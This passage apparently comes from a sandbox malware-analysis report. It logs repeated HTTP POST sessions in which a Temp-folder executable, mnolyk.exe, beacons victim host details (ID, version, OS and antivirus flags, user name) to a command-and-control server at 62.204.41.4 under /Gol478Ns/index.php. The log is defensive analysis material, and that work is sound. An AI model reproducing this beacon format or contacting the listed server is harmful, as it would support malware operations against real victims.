                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:08.361413956 CET476INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      440192.168.2.75016862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:57.812117100 CET900OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:57.878155947 CET900INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      441192.168.2.75016962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:58.055435896 CET901OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:58.122500896 CET901INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      442192.168.2.75017062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:58.303704977 CET902OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:58.366751909 CET902INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      443192.168.2.75017162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:58.553510904 CET903OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:58.617981911 CET903INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      444192.168.2.75017262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:58.795469999 CET904OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:58.858475924 CET904INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      445192.168.2.75017362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:59.034323931 CET905OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:59.099589109 CET905INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      446192.168.2.75017462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:59.284898043 CET906OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:59.348211050 CET906INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      447192.168.2.75017562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:59.517986059 CET907OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:59.580991983 CET907INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      448192.168.2.75017662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:59.752747059 CET908OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:59.817588091 CET908INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      449192.168.2.75017762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:59.985865116 CET909OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:00.050785065 CET909INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      45192.168.2.74976962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:08.538973093 CET476OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:08.622246027 CET477INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      450192.168.2.75017862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:00.218801022 CET910OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:00.281066895 CET910INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      451192.168.2.75017962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:00.453202963 CET911OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:00.517158985 CET911INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      452192.168.2.75018062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:00.687932014 CET912OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:00.751907110 CET912INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      453192.168.2.75018162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:00.930274963 CET913OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:00.995223045 CET913INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      454192.168.2.75018262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:01.180151939 CET914OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:01.245896101 CET914INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      455192.168.2.75018362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:01.423474073 CET915OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:01.488751888 CET915INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      456192.168.2.75018462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:01.659964085 CET916OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:01.723052025 CET916INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      457192.168.2.75018562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:01.897078991 CET917OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:01.960419893 CET917INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
